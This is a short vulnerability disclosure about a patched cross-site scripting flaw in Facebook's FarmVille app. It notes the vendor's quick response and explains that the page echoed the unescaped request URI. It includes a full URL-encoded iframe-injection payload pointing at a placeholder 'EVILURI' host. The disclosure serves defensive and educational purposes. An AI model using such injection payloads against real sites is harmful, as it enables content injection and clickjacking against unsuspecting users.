FAXX Hack: FarmVille
Current Monthly Active Users: 33,439,207
Current Rank on Application Leaderboard: 1
Application Developer: Zynga
Responsiveness: After notifying Zynga, I received a reply almost immediately from their Senior Director of Security. The company moved swiftly to patch the hole, and they’ve been both very responsive and very gracious in their communications.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E
Notes: Several of the recent holes I’ve found are similar to this one. Rather than relaying a particular property from the URI within the FBML/HTML of the page, the application included a complete copy of the URI at some point. This often happens when an application includes a tracker or perhaps needs a form that submits back to the current page. But if the URI is not escaped prior to being included in such a context, one can add code to the end of the URI that closes a given tag and allows new tags to be inserted.